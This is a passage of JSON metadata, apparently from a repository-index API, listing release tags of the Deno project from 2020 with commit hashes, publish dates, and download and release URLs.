.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/a